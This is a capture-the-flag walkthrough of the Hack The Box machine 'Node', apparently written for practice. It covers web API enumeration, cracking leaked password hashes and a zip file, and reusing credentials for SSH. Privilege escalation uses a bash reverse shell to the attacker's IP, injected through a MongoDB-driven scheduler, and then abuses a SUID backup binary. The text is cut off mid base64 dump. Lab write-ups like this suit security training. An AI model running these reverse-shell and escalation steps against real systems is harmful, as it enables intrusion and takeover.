Nmap
Port 3000
Exploitation
Fcrackzip
SSH
Post exploitation
SUID
Running process
Privilege escalation
Root flag
Welcome to the Node writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Node
tags: HTB
Medium
Linux
OSCP
Platform: Hackthebox
Difficult: Medium
S.O.: Linux
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
# nmap -p- -T4 10.10.10.58
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-25 19:26 CET
Nmap scan report for 10.10.10.58
Host is up (0.093s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
Nmap done: 1 IP address (1 host up) scanned in 92.74 seconds
Now that we know the open ports, let's scan them in depth.
# nmap -A -Pn -p 22,3000 10.10.10.58
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-25 19:27 CET
Nmap scan report for 10.10.10.58
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 93.86 ms 10.10.14.1
2 93.88 ms 10.10.10.58
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.28 seconds
Port 3000
In port 3000 we can find a web server and by analyzing the source code of the website, we can find several javascript resources.
Inside the admin.js file we can see that it is making a GET
request to the URL /api/admin/backup
.
var controllers = angular.module('controllers');
controllers.controller('AdminCtrl', function ($scope, $http, $location, $window) {
$scope.backup = function () {
$window.open('/api/admin/backup', '_self');
}
$http.get('/api/session')
.then(function (res) {
if (res.data.authenticated) {
$scope.user = res.data.user;
}
else {
$location.path('/login');
}
});
});
When accessing the URL we can find 3 user accounts with their respective hashes.
Using the website crackstation we can get the passwords for tom
and mark
in plain text.
tom:spongebob
mark:snowflake
rastating:Can’t decrypt it
On the other hand, inside the profile.js
file we can find the URL api/users.
var controllers = angular.module('controllers');
controllers.controller('ProfileCtrl', function ($scope, $http, $routeParams) {
$http.get('/api/users/' + $routeParams.username)
.then(function (res) {
$scope.user = res.data;
}, function (res) {
$scope.hasError = true;
if (res.status == 404) {
$scope.errorMessage = 'This user does not exist';
}
else {
$scope.errorMessage = 'An unexpected error occurred';
}
});
});
And by accessing the URL api/users we can obtain the 3 previous accounts and a new one, that of the user myP14ceAdm1nAcc0uNT
with its hash and who is also an administrator as we can see in the parameteris_admin: true
.
And again we can get the password in plain text using the crackstation
service.
myP14ceAdm1nAcc0uNT:manchester
Now that we have a user with administrator permissions, we are going to authenticate on the website.
As we can see, we can download a Backup
file.
Let's see its content.
# cat myplace.backup | base64 -d > myplace
# file myplace
myplace: Zip archive data, at least v1.0 to extract
root [EvilBook] (10.10.14.7) ~/Descargas
# mv myplace myplace.zip
Exploitation
Fcrackzip
The zip file is password protected, but we can try to get it using fcrackzip
.
# fcrackzip -D -p /usr/share/wordlists/rockyou.txt myplace.zip
possible pw found: magicword ()
Great, now we can extract the content.
# unzip myplace.zip
Archive: myplace.zip
[myplace.zip] var/www/myplace/package-lock.json password:
inflating: var/www/myplace/package-lock.json
creating: var/www/myplace/node_modules/
creating: var/www/myplace/node_modules/serve-static/
inflating: var/www/myplace/node_modules/serve-static/README.md
.................................................................
.................................................................
The extracted content is a copy of the web application and analyzing its files, inside the app.js
file in its first lines we can find the credentials formongodb
of the user mark
.
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
Maybe they will help us to connect by SSH.
SSH
And we are inside via SSH with the credentials mark:5AYRft73VtFpc84k
found!
Post exploitation
SUID
Let's see what we have with the SUID bit set.
mark@node:~$ find / -perm /4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/local/bin/backup
/usr/bin/chfn
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/newuidmap
/bin/ping
/bin/umount
/bin/fusermount
/bin/ping6
/bin/ntfs-3g
/bin/su
/bin/mount
The /usr/local/bin/backup
binary has SUID rights but we cannot execute it being mark
.
Running process
Let's see what processes tom
has running.
mark@node:~$ ps -ef | grep tom
mark 612 596 0 07:43 pts/0 00:00:00 grep --color=auto tom
tom 1229 1 0 Mar25 ? 00:00:07 /usr/bin/node /var/scheduler/app.js
tom 1232 1 0 Mar25 ? 00:00:07 /usr/bin/node /var/www/myplace/app.js
tom 18349 1229 0 Mar25 ? 00:00:00 /bin/sh -c /bin/bash /tmp/shell.sh
tom 18350 18349 0 Mar25 ? 00:00:00 /bin/bash /tmp/shell.sh
tom 18351 18350 0 Mar25 ? 00:00:00 sh -i
tom 18356 18351 0 Mar25 ? 00:00:00 /bin/bash
tom 18358 18356 0 Mar25 ? 00:00:00 python3 -c import pty; pty.spawn('/bin/bash')
tom 18359 18358 0 Mar25 pts/2 00:00:00 /bin/bash
tom
is running another application with Node
called /var/scheduler/app.js
. Let's see its content.
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';
MongoClient.connect(url, function(error, db) {
if (error || !db) {
console.log('[!] Failed to connect to mongodb');
return;
}
setInterval(function () {
db.collection('tasks').find().toArray(function (error, docs) {
if (!error && docs) {
docs.forEach(function (doc) {
if (doc) {
console.log('Executing task ' + doc._id + '...');
exec(doc.cmd);
db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
}
});
}
else if (error) {
console.log('Something went wrong: ' + error);
}
});
}, 30000);
});
Well, as we see in the code, there is a function that lists all the records of the table tasks
of the database scheduler
of mongodb
and executes with the function exec()
the content of the corresponding record with the cmd
column, also as we can see, has an interval
of 30000
configured so that every 30 seconds it performs this process again.
We should be able to connect to the database and insert a new record with a command to run a reverse shell that we have saved in a script.
Privilege escalation
Well, the first thing we need to do is put a terminal to listen and create the script with the reverse shell inside.
mark@node:/tmp$ cat shell.sh
sh -i >& /dev/tcp/10.10.14.7/8787 0>&1
Now, we have to connect to the scheduler
database and insert a new record that executes our script. Inserting {cmd:"/bin/bash /tmp/shell.sh"}
should work.
mark@node:/home/tom$ mongo localhost:27017/scheduler -u mark -p 5AYRft73VtFpc84k
MongoDB shell version: 3.2.16
connecting to: localhost:27017/scheduler
> sh -i >& /dev/tcp/10.10.14.7/8787 0>&1
2021-03-25T19:45:26.389+0000 E QUERY [thread1] SyntaxError: expected expression, got '&' @(shell):1:7
> db.tasks.find()
> db.tasks.insert({cmd:"/bin/bash /tmp/shell.sh"});
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
{ "_id" : ObjectId("605ce5e877be912640c6765d"), "cmd" : "/bin/bash /tmp/shell.sh" }
>
We just have to wait a few seconds... and we have a shell!
# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.58] 32886
sh: 0: can't access tty; job control turned off
$
Perfect, now we can read the user flag inside the tom
home.
tom@node:~$ cat user.txt
CENSORED_FLAG
Root flag
Now that we are tom
, we can run the SUID backup
we found earlier.
As we can see in the app.js
file downloaded in the backup
of the website, the execution syntax of the binary is /usr/local/bin/backup
followed by -q key
and the path to perform the backup.
app.get('/api/admin/backup', function (req, res) {
if (req.session.user && req.session.user.is_admin) {
var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
var backup = '';
proc.on("exit", function(exitCode) {
res.header("Content-Type", "text/plain");
res.header("Content-Disposition", "attachment; filename=myplace.backup");
res.send(backup);
});
proc.stdout.on("data", function(chunk) {
backup += chunk;
});
proc.stdout.on("end", function() {
});
}
else {
res.send({
authenticated: false
});
}
});
Well, we are going to ask you to make a backup of the root
directory. We must remember that the result will be a zip
file in base64
.
tom@node:~$ /usr/local/bin/backup -q "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474" "/root"
[+] Finished! Encoded backup is below:
UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==
Let's decode it.
# echo "UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==" | base64 -d > root.zip
In this case, unzip
is not working so we are going to use 7za
. The password to unzip is magicword
which is the same as we cracked earlier.
# 7za x root.zip
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=es_ES.utf8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz (806EA),ASM,AES-NI)
Scanning the drive for archives:
1 file, 1141 bytes (2 KiB)
Extracting archive: root.zip
--
Path = root.zip
Type = zip
Physical Size = 1141
Enter password (will not be echoed):
Everything is Ok
Size: 2584
Compressed: 1141
When unzipping it, we obtain the file root.txt
, we are going to read the flag.
# cat root.txt
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP" <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` .. "??$Qa "WQQQWTVP' "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ
QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ
QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^ ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc <aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6, QWQWQQQk <c jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,., . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ
Wow, we've been trolled!
Let's analyze the flow of the program with ltrace
.
tom@node:/$ ltrace /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /root
__libc_start_main(0x80489fd, 4, 0xffea6174, 0x80492c0 <unfinished ...>
geteuid() = 1000
setuid(1000) = 0
strcmp("-q", "-q") = 0
strncpy(0xffea6038, "45fac180e9eee72f4fd2d9386ea7033e"..., 100) = 0xffea6038
strcpy(0xffea6021, "/") = 0xffea6021
strcpy(0xffea602d, "/") = 0xffea602d
strcpy(0xffea5fb7, "/e") = 0xffea5fb7
strcat("/e", "tc") = "/etc"
strcat("/etc", "/m") = "/etc/m"
strcat("/etc/m", "yp") = "/etc/myp"
strcat("/etc/myp", "la") = "/etc/mypla"
strcat("/etc/mypla", "ce") = "/etc/myplace"
strcat("/etc/myplace", "/k") = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey") = "/etc/myplace/key"
strcat("/etc/myplace/key", "s") = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r") = 0x95e7008
fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x95e7008) = 0xffea5bcf
strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "a01a6aa5aaf1d7729f35c8278daae30f"...) = -1
fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x95e7008) = 0xffea5bcf
strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "45fac180e9eee72f4fd2d9386ea7033e"...) = 0
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x95e7008) = 0xffea5bcf
strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "3de811f4ab2b7543eaf45df611c2dd25"...) = 1
fgets("\n", 1000, 0x95e7008) = 0xffea5bcf
strcspn("\n", "\n") = 0
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "") = 1
fgets(nil, 1000, 0x95e7008) = 0
strstr("/root", "..") = nil
strstr("/root", "/root") = "/root"
strcpy(0xffea4c08, "Finished! Encoded backup is belo"...) = 0xffea4c08
printf(" %s[+]%s %s\n", "\033[32m", "\033[37m", "Finished! Encoded backup is belo"... [+] Finished! Encoded backup is below:
) = 51
puts("UEsDBDMDAQBjAG++IksAAAAA7QMAABgK"...UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==
) = 1525
exit(0 <no return ...>
+++ exited (status 0) +++
tom@node:/$
So the binary is comparing that the requested path is /root
as we can see here strstr("/root", "/root")
. Nothing happens ... we can solve it by assigning in the environment variables that the HOME
of tom
is /root
and thus we can request the binary to backup the tom
home.
tom@node:/$ export HOME=/root
tom@node:/$ /usr/local/bin/backup -q "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474" "~"
$ /usr/local/bin/backup -q "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474" "~"
UEsDBAoAAAAAABwWO0sAAAAAAAAAAAAAAAAFABwAcm9vdC9VVAkAA4cDy1mn8FxgdXgLAAEEAAAAAAQAAAAAUEsDBBQACQAIANGDEUd/sK5kgwAAAJQAAAANABwAcm9vdC8ucHJvZmlsZVVUCQADGf7RVafwXGB1eAsAAQQAAAAABAAAAAAqqI3TrmsV+iDiA6QOgcmk55oSaOqGnmlXqXZ+ahOZbgV8qrPj39LuSt3KPACjZrW9Xp6TWBgX8rtVNtt4f9HavJjvH6S53XJSZB/rJnz24O/I5iX+xNbWqod/UYtnSGXJegEJXqmkbVUz/OgH2+/9q1z7kKW1mkoReRfEik99g2zUsVBLBwh/sK5kgwAAAJQAAABQSwMEFAAJAAgAHBY7S9xSZRxNAAAAVQAAABIAHAByb290Ly5iYXNoX2hpc3RvcnlVVAkAA4cDy1mn8FxgdXgLAAEEAAAAAAQAAAAAnS4NpNmo5WmOhsAByMNIrVq6qCCA3sl64viNCoGt4JM0/Nt744Tz+gJSnzyrcJaYadaQnPb/CuHCCjZ4Dw1B/5/7InCiRFEwdBiIz4xQSwcI3FJlHE0AAABVAAAAUEsDBAoAAAAAADR8I0sAAAAAAAAAAAAAAAAMABwAcm9vdC8uY2FjaGUvVVQJAAPDEqxZp/BcYHV4CwABBAAAAAAEAAAAAFBLAwQKAAkAAAA0fCNLAAAAAAwAAAAAAAAAIAAcAHJvb3QvLmNhY2hlL21vdGQubGVnYWwtZGlzcGxheWVkVVQJAAPDEqxZp/BcYHV4CwABBAAAAAAEAAAAAD/HBIzeaYfQgRw/ulBLBwgAAAAADAAAAAAAAABQSwMECgAJAAAA1H0jS/KON0AtAAAAIQAAAA0AHAByb290L3Jvb3QudHh0VVQJAAPQFaxZp/BcYHV4CwABBAAAAAAEAAAAAE38VXQwB0DnuzHbP8jPsNkHNUgfZ6V/S+EcccNOJyJIAQnSwacvQUiUOQxfTVBLBwjyjjdALQAAACEAAABQSwMEFAAJAAgA65FWR73lED6bBQAAIgwAAAwAHAByb290Ly5iYXNocmNVVAkAA6kZKVan8FxgdXgLAAEEAAAAAAQAAAAA9pQQS9gMKo5SCQjLDtSbizUZnLcF8g0Hi5sHa2Phi/GWTh6AQAL6vFf/tEU9sQKubKsF95ejMcS908g4aeQIobyWWnyYLzy3xadAOyoux2OidmdtAKEkx36XznEas/IuCx90GhI9qvIei/taAkp9RNVTfxN4Y0eVcyIznu0N7eREcrcO4Y65Qcc8kuIG3S8NQreHhFLBHxMQwNWGtPUsdfTr2ougr1OZ0gSyLv3f7BqemSg17TPgLnUx7DMKSeBCF3siixjAP9s0H3pfnNZhPZHPdQ/n+6whZdSXNNTemyc+yRZCLLvIcwbx3WM0vSIXH4VqlW7EO/aXOUTYBApoR7w//MDvE+asrPlHhPsI+yr5i5gqSxBIToIXfxAkCvVUcYs4WqUaeLvFkH90pBWThlNXWAn2Q+EB4zfT5dQS01b1BkM3If0w5B8m+RsP4Kz9VUf4d2pM+jKJIqY5leTdwdAc1rWdMth/IMiXLCF6RGjNZErnqBQxLf3K2jipqFkVH6RxbyHJdzVnoj+